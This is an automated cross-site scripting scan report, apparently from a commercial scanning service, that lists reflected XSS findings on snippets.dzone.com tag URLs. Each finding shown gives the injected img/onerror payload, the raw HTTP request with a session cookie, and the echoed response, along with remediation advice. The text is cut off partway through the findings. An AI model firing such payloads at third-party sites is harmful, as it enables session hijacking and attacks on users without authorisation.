Contractor for Hire: Per Minute, Per Day, Bounty Hunting
Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Fri Nov 12 12:35:28 EST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. Cross-site scripting (reflected)
1.1. http://snippets.dzone.com/tag/Fibonacci+Series [REST URL parameter 2]
1.2. http://snippets.dzone.com/tag/Find+Factorial [REST URL parameter 2]
1.3. http://snippets.dzone.com/tag/REBOL [REST URL parameter 2]
1.4. http://snippets.dzone.com/tag/Stack+using+Linked+List [REST URL parameter 2]
1.5. http://snippets.dzone.com/tag/activerecord [REST URL parameter 2]
1.6. http://snippets.dzone.com/tag/apache [REST URL parameter 2]
1.7. http://snippets.dzone.com/tag/array [REST URL parameter 2]
1.8. http://snippets.dzone.com/tag/bash [REST URL parameter 2]
1.9. http://snippets.dzone.com/tag/c [REST URL parameter 2]
1.10. http://snippets.dzone.com/tag/c++ [REST URL parameter 2]
1.11. http://snippets.dzone.com/tag/characters [REST URL parameter 2]
1.12. http://snippets.dzone.com/tag/convert [REST URL parameter 2]
1.13. http://snippets.dzone.com/tag/csharp [REST URL parameter 2]
1.14. http://snippets.dzone.com/tag/css [REST URL parameter 2]
1.15. http://snippets.dzone.com/tag/database [REST URL parameter 2]
1.16. http://snippets.dzone.com/tag/date [REST URL parameter 2]
1.17. http://snippets.dzone.com/tag/duplicate [REST URL parameter 2]
1.18. http://snippets.dzone.com/tag/file [REST URL parameter 2]
1.19. http://snippets.dzone.com/tag/find [REST URL parameter 2]
1.20. http://snippets.dzone.com/tag/google [REST URL parameter 2]
1.21. http://snippets.dzone.com/tag/hash [REST URL parameter 2]
1.22. http://snippets.dzone.com/tag/html [REST URL parameter 2]
1.23. http://snippets.dzone.com/tag/http [REST URL parameter 2]
1.24. http://snippets.dzone.com/tag/id3lib [REST URL parameter 2]
1.25. http://snippets.dzone.com/tag/image [REST URL parameter 2]
1.26. http://snippets.dzone.com/tag/java [REST URL parameter 2]
1.27. http://snippets.dzone.com/tag/javascript [REST URL parameter 2]
1.28. http://snippets.dzone.com/tag/jonas [REST URL parameter 2]
1.29. http://snippets.dzone.com/tag/jsfromhell [REST URL parameter 2]
1.30. http://snippets.dzone.com/tag/linux [REST URL parameter 2]
1.31. http://snippets.dzone.com/tag/math [REST URL parameter 2]
1.32. http://snippets.dzone.com/tag/mysql [REST URL parameter 2]
1.33. http://snippets.dzone.com/tag/osx [REST URL parameter 2]
1.34. http://snippets.dzone.com/tag/perl [REST URL parameter 2]
1.35. http://snippets.dzone.com/tag/php [REST URL parameter 2]
1.36. http://snippets.dzone.com/tag/python [REST URL parameter 2]
1.37. http://snippets.dzone.com/tag/rails [REST URL parameter 2]
1.38. http://snippets.dzone.com/tag/raoni [REST URL parameter 2]
1.39. http://snippets.dzone.com/tag/regex [REST URL parameter 2]
1.40. http://snippets.dzone.com/tag/remove [REST URL parameter 2]
1.41. http://snippets.dzone.com/tag/rexml [REST URL parameter 2]
1.42. http://snippets.dzone.com/tag/rmagick [REST URL parameter 2]
1.43. http://snippets.dzone.com/tag/rscript [REST URL parameter 2]
1.44. http://snippets.dzone.com/tag/ruby [REST URL parameter 2]
1.45. http://snippets.dzone.com/tag/rubyonrails [REST URL parameter 2]
1.46. http://snippets.dzone.com/tag/series60 [REST URL parameter 2]
1.47. http://snippets.dzone.com/tag/shell [REST URL parameter 2]
1.48. http://snippets.dzone.com/tag/sinatra [REST URL parameter 2]
1.49. http://snippets.dzone.com/tag/sql [REST URL parameter 2]
1.50. http://snippets.dzone.com/tag/string [REST URL parameter 2]
1.51. http://snippets.dzone.com/tag/text [REST URL parameter 2]
1.52. http://snippets.dzone.com/tag/time [REST URL parameter 2]
1.53. http://snippets.dzone.com/tag/ubuntu [REST URL parameter 2]
1.54. http://snippets.dzone.com/tag/unix [REST URL parameter 2]
1.55. http://snippets.dzone.com/tag/url [REST URL parameter 2]
1.56. http://snippets.dzone.com/tag/virtualbox [REST URL parameter 2]
1.57. http://snippets.dzone.com/tag/virtualization [REST URL parameter 2]
1.58. http://snippets.dzone.com/tag/web [REST URL parameter 2]
1.59. http://snippets.dzone.com/tag/win32screenshot [REST URL parameter 2]
1.60. http://snippets.dzone.com/tag/windows [REST URL parameter 2]
1.61. http://snippets.dzone.com/tag/xml [REST URL parameter 2]
1.62. http://snippets.dzone.com/tag/xslt [REST URL parameter 2]
1. Cross-site scripting (reflected)
There are 62 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://snippets.dzone.com/tag/Fibonacci+Series [REST URL parameter 2]
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/Fibonacci+Series |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 351ca<img%20src%3da%20onerror%3dalert(1)>17265262597 was submitted in the REST URL parameter 2. This input was echoed as 351ca<img src=a onerror=alert(1)>17265262597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/Fibonacci+Series351ca<img%20src%3da%20onerror%3dalert(1)>17265262597 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:58 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9469
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/Fibonacci+Series351ca%3Cimg+src%3Da+onerror%3Dalert%281%29%3E17265262597">Fibonacci Series351ca<img src=a onerror=alert(1)>17265262597</a>
...[SNIP]...
|
1.2. http://snippets.dzone.com/tag/Find+Factorial [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/Find+Factorial |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6d27<img%20src%3da%20onerror%3dalert(1)>03a8c01414b was submitted in the REST URL parameter 2. This input was echoed as c6d27<img src=a onerror=alert(1)>03a8c01414b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/Find+Factorialc6d27<img%20src%3da%20onerror%3dalert(1)>03a8c01414b HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:56 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9463
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/Find+Factorialc6d27%3Cimg+src%3Da+onerror%3Dalert%281%29%3E03a8c01414b">Find Factorialc6d27<img src=a onerror=alert(1)>03a8c01414b</a>
...[SNIP]...
|
1.3. http://snippets.dzone.com/tag/REBOL [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/REBOL |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29ae5<img%20src%3da%20onerror%3dalert(1)>4d006ffd09a was submitted in the REST URL parameter 2. This input was echoed as 29ae5<img src=a onerror=alert(1)>4d006ffd09a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/REBOL29ae5<img%20src%3da%20onerror%3dalert(1)>4d006ffd09a HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:35 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/REBOL29ae5%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4d006ffd09a">REBOL29ae5<img src=a onerror=alert(1)>4d006ffd09a</a>
...[SNIP]...
|
1.4. http://snippets.dzone.com/tag/Stack+using+Linked+List [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/Stack+using+Linked+List |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f02dc<img%20src%3da%20onerror%3dalert(1)>c29244d3e65 was submitted in the REST URL parameter 2. This input was echoed as f02dc<img src=a onerror=alert(1)>c29244d3e65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/Stack+using+Linked+Listf02dc<img%20src%3da%20onerror%3dalert(1)>c29244d3e65 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:10 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9490
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/Stack+using+Linked+Listf02dc%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec29244d3e65">Stack using Linked Listf02dc<img src=a onerror=alert(1)>c29244d3e65</a>
...[SNIP]...
|
1.5. http://snippets.dzone.com/tag/activerecord [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/activerecord |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65681<img%20src%3da%20onerror%3dalert(1)>020c70cfdba was submitted in the REST URL parameter 2. This input was echoed as 65681<img src=a onerror=alert(1)>020c70cfdba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/activerecord65681<img%20src%3da%20onerror%3dalert(1)>020c70cfdba HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:39 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9457
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/activerecord65681%3Cimg+src%3Da+onerror%3Dalert%281%29%3E020c70cfdba">activerecord65681<img src=a onerror=alert(1)>020c70cfdba</a>
...[SNIP]...
|
1.6. http://snippets.dzone.com/tag/apache [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/apache |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bac0e<img%20src%3da%20onerror%3dalert(1)>395e0b87748 was submitted in the REST URL parameter 2. This input was echoed as bac0e<img src=a onerror=alert(1)>395e0b87748 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/apachebac0e<img%20src%3da%20onerror%3dalert(1)>395e0b87748 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:38 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/apachebac0e%3Cimg+src%3Da+onerror%3Dalert%281%29%3E395e0b87748">apachebac0e<img src=a onerror=alert(1)>395e0b87748</a>
...[SNIP]...
|
1.7. http://snippets.dzone.com/tag/array [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/array |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f112<img%20src%3da%20onerror%3dalert(1)>a4aedb235f8 was submitted in the REST URL parameter 2. This input was echoed as 4f112<img src=a onerror=alert(1)>a4aedb235f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/array4f112<img%20src%3da%20onerror%3dalert(1)>a4aedb235f8 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:39 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/array4f112%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea4aedb235f8">array4f112<img src=a onerror=alert(1)>a4aedb235f8</a>
...[SNIP]...
|
1.8. http://snippets.dzone.com/tag/bash [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/bash |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c32e<img%20src%3da%20onerror%3dalert(1)>edf34cddc50 was submitted in the REST URL parameter 2. This input was echoed as 9c32e<img src=a onerror=alert(1)>edf34cddc50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/bash9c32e<img%20src%3da%20onerror%3dalert(1)>edf34cddc50 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:35 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/bash9c32e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eedf34cddc50">bash9c32e<img src=a onerror=alert(1)>edf34cddc50</a>
...[SNIP]...
|
1.9. http://snippets.dzone.com/tag/c [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/c |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce65e<img%20src%3da%20onerror%3dalert(1)>df74c73e928 was submitted in the REST URL parameter 2. This input was echoed as ce65e<img src=a onerror=alert(1)>df74c73e928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/cce65e<img%20src%3da%20onerror%3dalert(1)>df74c73e928 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:15:31 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9424
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/cce65e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edf74c73e928">cce65e<img src=a onerror=alert(1)>df74c73e928</a>
...[SNIP]...
|
1.10. http://snippets.dzone.com/tag/c++ [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/c++ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f5ad<img%20src%3da%20onerror%3dalert(1)>e05db046d95 was submitted in the REST URL parameter 2. This input was echoed as 4f5ad<img src=a onerror=alert(1)>e05db046d95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/c++4f5ad<img%20src%3da%20onerror%3dalert(1)>e05db046d95 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:15:36 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/c++4f5ad%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee05db046d95">c 4f5ad<img src=a onerror=alert(1)>e05db046d95</a>
...[SNIP]...
|
1.11. http://snippets.dzone.com/tag/characters [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/characters |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0549<img%20src%3da%20onerror%3dalert(1)>848d04a5eb7 was submitted in the REST URL parameter 2. This input was echoed as d0549<img src=a onerror=alert(1)>848d04a5eb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/charactersd0549<img%20src%3da%20onerror%3dalert(1)>848d04a5eb7 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:53 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9451
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/charactersd0549%3Cimg+src%3Da+onerror%3Dalert%281%29%3E848d04a5eb7">charactersd0549<img src=a onerror=alert(1)>848d04a5eb7</a>
...[SNIP]...
|
1.12. http://snippets.dzone.com/tag/convert [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/convert |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f90c8<img%20src%3da%20onerror%3dalert(1)>1c244db46a7 was submitted in the REST URL parameter 2. This input was echoed as f90c8<img src=a onerror=alert(1)>1c244db46a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/convertf90c8<img%20src%3da%20onerror%3dalert(1)>1c244db46a7 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:39 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9442
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/convertf90c8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1c244db46a7">convertf90c8<img src=a onerror=alert(1)>1c244db46a7</a>
...[SNIP]...
|
1.13. http://snippets.dzone.com/tag/csharp [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/csharp |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1013c<img%20src%3da%20onerror%3dalert(1)>3047c1b849d was submitted in the REST URL parameter 2. This input was echoed as 1013c<img src=a onerror=alert(1)>3047c1b849d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/csharp1013c<img%20src%3da%20onerror%3dalert(1)>3047c1b849d HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:43 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/csharp1013c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3047c1b849d">csharp1013c<img src=a onerror=alert(1)>3047c1b849d</a>
...[SNIP]...
|
1.14. http://snippets.dzone.com/tag/css [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
